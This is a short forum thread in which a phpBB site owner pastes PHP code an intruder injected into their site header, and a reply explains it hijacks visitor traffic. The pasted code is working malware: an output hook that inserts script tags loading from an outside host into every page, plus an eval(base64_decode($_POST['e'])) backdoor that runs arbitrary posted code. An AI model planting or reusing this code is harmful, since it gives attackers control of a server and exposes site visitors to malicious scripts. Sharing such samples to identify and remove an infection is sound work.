hi all, does this code meen anything to anyone. somone hacked my account and pasted it into the header of phpbb.
<head><?php if (!function_exists('uq2')) { function uq2($s) { if (preg_match_all('#<script(.*?)</script>#is', $s, $a))foreach($a[0]as$v)if(count(explode("\n", $v))>5) { $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v)||preg_match('#[\(\[](\s*\d+,){20,}#', $v); if ((preg_match('#\beval\b#', $v)&&($e||strpos($v, 'fromCharCode')))||($e&&strpos($v, 'document.write')))$s=str_replace($v, '', $s); } if(preg_match_all('#<iframe([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i', $v)&&!strstr($v, '?'.'>'))$s=preg_replace('#'.preg_quote($v, '#').'.*?</iframe>#is', '', $s); $s=str_replace($a='<script src=http://vasaikar.org/mambots/search.php ></script><script src=http://vasaikar.org/mambots/search.php ></script>', '', $s); if(stristr($s, '<body')) { $s=preg_replace('#(\s*<body)#mi', $a.'\1', $s, 1); } elseif (strpos($s, '<a')) { $s=$a.$s; } return$s; } function uq22($a, $b, $c, $d) { global$uq21; $s=array(); if (function_exists($uq21)) { call_user_func($uq21, $a, $b, $c, $d); } foreach (@ob_get_status(1)as$v) { if (($a=$v['name'])=='uq2')return; } elseif($a=='ob_gzhandler') { break; } else { $s[]=array($a=='default output handler'?false:$a); } for ($i=count($s)-1; $i>=0; $i--) { $s[$i][1]=ob_get_contents(); ob_end_clean(); } ob_start('uq2'); for ($i=0; $i<count($s); $i++) { ob_start($s[$i][0]); echo $s[$i][1]; } } } $uq2l=(($a=@set_error_handler('uq22'))!='uq22')?$a:0; eval(base64_decode($_POST['e'])); ?> PHP:
yes you were hacked and your traffic will be hijacked to the jerk off hackers site of choice. in this case vasaikar.org/mambots/search.php
of course its not legal - no hacvking - hijacking is If you want some assistance private message me. I am located in UK so on same timeframe as you.